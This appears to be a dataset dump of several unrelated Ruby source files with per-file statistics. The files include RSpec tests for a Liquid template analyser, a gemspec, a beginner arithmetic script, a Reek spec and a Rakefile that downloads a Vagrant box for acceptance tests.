2854e06f4b7ea0a08c87484eab4ae362fa3ac84d | 4,851 | require "spec_helper"
require "pry"
describe Liql do
let(:layout) { File.read(File.expand_path("../support/layout.html.liquid", __FILE__)) }
it "has a version number" do
expect(Liql::VERSION).not_to be nil
end
it "binds assigns on static values" do
mapping = Liql.parse(<<-LIQUID)
{% assign foo = 'foo' %}
{% assign bar = 1 %}
{% assign baz = false %}
LIQUID
foo_binding = mapping.bindings["foo"].first
static_foo = Liql::StaticValue.new(value: "foo")
expect(foo_binding).to(be_a(Liql::Variable))
expect(foo_binding.ref).to(eq(static_foo))
bar_binding = mapping.bindings["bar"].first
static_bar = Liql::StaticValue.new(value: 1)
expect(bar_binding).to(be_a(Liql::Variable))
expect(bar_binding.ref).to(eq(static_bar))
baz_binding = mapping.bindings["baz"].first
static_baz = Liql::StaticValue.new(value: false)
expect(baz_binding).to(be_a(Liql::Variable))
expect(baz_binding.ref).to(eq(static_baz))
end
it "binds variables when they're used in mustache" do
mapping = Liql.parse("{{ foo }}")
binding = mapping.bindings["foo"].first
expect(binding).to(be_a(Liql::Variable))
expect(binding.ref).to(be_nil)
end
it "ignores text" do
mapping = Liql.parse("THIS. IS. HTML!")
expect(mapping.bindings).to(be_empty)
end
it "binds all branches for if node" do
mapping = Liql.parse(<<-LIQUID)
{% if foo %}
{{ bar }}
{% elsif baz %}
{{ toto }}
{% endif %}
LIQUID
expect(mapping.bindings.keys).to(eq(%w(foo bar baz toto)))
expect(mapping.bindings.values.map(&:first)).to(all(be_a(Liql::Variable)))
end
it "binds with binops" do
mapping = Liql.parse("{% assign foo = bar != baz %}")
foo_binding = mapping.bindings["foo"].first
bar_binding = mapping.bindings["bar"].first
baz_binding = mapping.bindings["baz"].first
expect(bar_binding).to(be_a(Liql::Variable))
expect(baz_binding).to(be_a(Liql::Variable))
expect(foo_binding).to(be_a(Liql::Variable))
expect(foo_binding.ref).to(eq(Liql::StaticValue.new(value: :bool)))
end
it "binds variables when they're used in filters" do
mapping = Liql.parse("{{ foo | bar: baz: toto | tutu: tata }}")
foo_binding = mapping.bindings["foo"].first
toto_binding = mapping.bindings["toto"].first
expect(foo_binding).to(be_a(Liql::Variable))
expect(toto_binding).to(be_a(Liql::Variable))
end
it "assigns set references" do
mapping = Liql.parse("{% assign foo = bar %}")
foo_binding = mapping.bindings["foo"].first
bar_binding = mapping.bindings["bar"].first
expect(foo_binding.ref).to(eq(bar_binding))
end
it "for node creates a new lexical scope with a reference variable" do
mapping = Liql.parse("{% for foo in foos %}%{% endfor %}")
foos_binding = mapping.bindings["foos"].first
foo_binding = mapping.children.first.bindings["foo"].first
expect(foo_binding).to(be_a(Liql::Variable))
expect(foo_binding.ref).to(eq(foos_binding))
end
it "for node infers that the thing is a collection" do
mapping = Liql.parse("{% for foo in foos %}%{% endfor %}")
foos_binding = mapping.bindings["foos"].first
expect(foos_binding).to(be_a(Liql::Variable))
expect(foos_binding.schema).to(be_a(Liql::CollectionSchema))
expect(foos_binding.schema.item_schema).to(be_nil)
end
it "can augment properties of variables through re-bound variables" do
mapping = Liql.parse(<<-LIQUID)
{% assign p = product %}
{{ p.variants }}
{% assign foo = p %}
{{ foo.handle }}
LIQUID
product_binding = mapping.bindings["product"].first
expect(product_binding).to(be_a(Liql::Variable))
expect(product_binding.properties["variants"]).to(be_a(Liql::Property))
expect(product_binding.properties["handle"]).to(be_a(Liql::Property))
end
it "as_call_tree returns a flat map of bindings" do
scope = Liql::LexicalScope.new(
bindings: {
"foo" => [
Liql::Variable.new(name: "foo", properties: { "bar" => Liql::Property.new(name: "bar")}),
]
}
)
child = scope.add_child_scope
child.bindings = {
"foo" => [
Liql::Variable.new(name: "foo", properties: { "baz" => Liql::Property.new(name: "baz")}),
]
}
bindings = scope.as_call_tree
expect(bindings).to(be_a(Hash))
expect(bindings["foo"].count).to(eq(2))
expect(bindings["foo"][0]).to(
be_a_variable(
Liql::Variable.new(name: "foo", properties: { "bar" => Liql::Property.new(name: "bar")}),
))
expect(bindings["foo"][1]).to(
be_a_variable(
Liql::Variable.new(name: "foo", properties: { "baz" => Liql::Property.new(name: "baz")}),
))
end
it "can augment properties on index-access if the property is a static value"
end
| 33.455172 | 99 | 0.647289 |
18055f1e99512a4eaec6d6f7a842ba87f79ef70e | 499 | class String
def base_conversion(src, dest)
x = self.chars.inject(0) { |acc, c|
acc * src + c.ord - '0'.ord
}
result = ""
while x > 0
div, mod = x.divmod(dest)
result = (mod + (mod < 10 ? '0'.ord : 'A'.ord - 10)).chr + result
x = div
end
result
end
end
puts [["255", 10, 16],
["111", 2, 10],
["111", 2, 16]].map{ |x| "#{x.inspect} - #{x[0].base_conversion(x[1], x[2])}" }
| 23.761905 | 85 | 0.418838 |
1d579ce6802fcad5d05289cc3897d66600ab2846 | 1,285 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'I18ner/version'
Gem::Specification.new do |spec|
spec.name = "I18ner"
spec.version = I18ner::VERSION
spec.authors = ["Adam Panzer"]
spec.email = ["[email protected]"]
spec.summary = %q{Parse I18n YAML files quickly}
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata['allowed_push_host'] = "TODO: Set to 'http://mygemserver.com'"
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = "bin"
spec.executables = ['18n']
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.14"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec", "~> 3.0"
spec.add_development_dependency "pry"
spec.add_development_dependency 'i18n'
end
| 34.72973 | 96 | 0.669261 |
39f015acec928335eacb41f0a4a1a6cc620e8e7b | 1,339 | # ruby 5-math-and-numbers.rb
num_a = 5.0
num_b = 2.0
# Printing Numbers
print ("A: ")
puts (num_a)
print ("B: ")
puts (num_b)
# <== Printing Calcs ==>
print ("\nSum: ")
puts (num_a + num_b)
print ("Subtraction: ")
puts (num_a - num_b)
print ("Multiplication: ")
puts (num_a * num_b)
print ("Division: ")
puts (num_a / num_b)
# DEPRECATED
#print ("Exponential INT: ")
#puts (5^2)
# NEW METHOD
print ("Exponential: ")
puts (num_a ** num_b)
print ("Div. Remainder: ")
puts (num_a % num_b)
# Printing in one line, converting to String
puts ("Printing the value after converting to String: " + num_a.to_s())
# Initializing new variables
neg_num_a = -num_a
float_num_a = num_a + 0.7654321
# Printing more Numbers
print ("\nNegative A: ")
puts (neg_num_a)
print (" Float A: ")
puts (float_num_a)
puts ("\nAbsolute number: " + neg_num_a.abs().to_s())
puts (" Rounded Number: " + float_num_a.round().to_s()) # Statistically correct round number
puts (" Ceil Number: " + float_num_a.ceil().to_s()) # Higher number
puts (" Floor Number: " + float_num_a.floor().to_s()) # Lower Number
# Using Math Class methods
puts ("\n~> Math Class Methods")
puts ("Square Root from " + (num_a**2).round().to_s() + ": " + Math.sqrt(num_a**2).to_s())
puts ("Log (10 as base) from " + num_a.to_s() + ": " + Math.log10(num_a).to_s()) | 23.086207 | 92 | 0.646751 |
3859146729323dbd574383c84bb11f8f0ecd6986 | 867 | require_relative '../spec_helper'
require_lib 'reek/report'
RSpec.describe Reek::Report do
describe '.report_class' do
it 'returns the correct class' do
expect(described_class.report_class(:text)).to eq Reek::Report::TextReport
end
end
describe '.location_formatter' do
it 'returns the correct class' do
expect(described_class.location_formatter(:plain)).to eq Reek::Report::Formatter::BlankLocationFormatter
end
end
describe '.heading_formatter' do
it 'returns the correct class' do
expect(described_class.heading_formatter(:quiet)).to eq Reek::Report::Formatter::QuietHeadingFormatter
end
end
describe '.warning_formatter_class' do
it 'returns the correct class' do
expect(described_class.warning_formatter_class(:simple)).to eq Reek::Report::Formatter::SimpleWarningFormatter
end
end
end
| 29.896552 | 116 | 0.745098 |
61303bf726ad75166bcabe031b4541a0887908ed | 1,246 | namespace :acceptance do
desc "displays components that can be tested"
task :components do
exec("vagrant-spec components --config=acceptance/vagrant-spec.config.rb")
end
task :setup do
box = 'alpine/alpine64'
box_version = '3.7.0'
provider_name = 'virtualbox'
box_owner, box_name = box.split('/')
box_path = File.join('acceptance', 'artifacts', "#{provider_name}.box")
if !File.exist?(box_path)
$stderr.puts "Downloading guest box #{box}"
cmd = "curl -Lf -o #{box_path} https://app.vagrantup.com/#{box_owner}/boxes/#{box_name}/versions/#{box_version}/providers/#{provider_name}.box"
result = system(cmd)
if !result
$stderr.puts
$stderr.puts "ERROR: Failed to download guest box #{guest_box} for #{provider_name}!"
exit 1
end
end
end
desc "runs acceptance tests"
task :run do
args = [
"--config=acceptance/vagrant-spec.config.rb",
]
if ENV["COMPONENTS"]
args << "--components=\"#{ENV["COMPONENTS"]}\""
end
command = "vagrant-spec test #{args.join(" ")}"
puts command
puts
exec(command)
end
end
task :acceptance do
Rake::Task['acceptance:setup'].invoke
Rake::Task['acceptance:run'].invoke
end
| 27.086957 | 149 | 0.639647 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.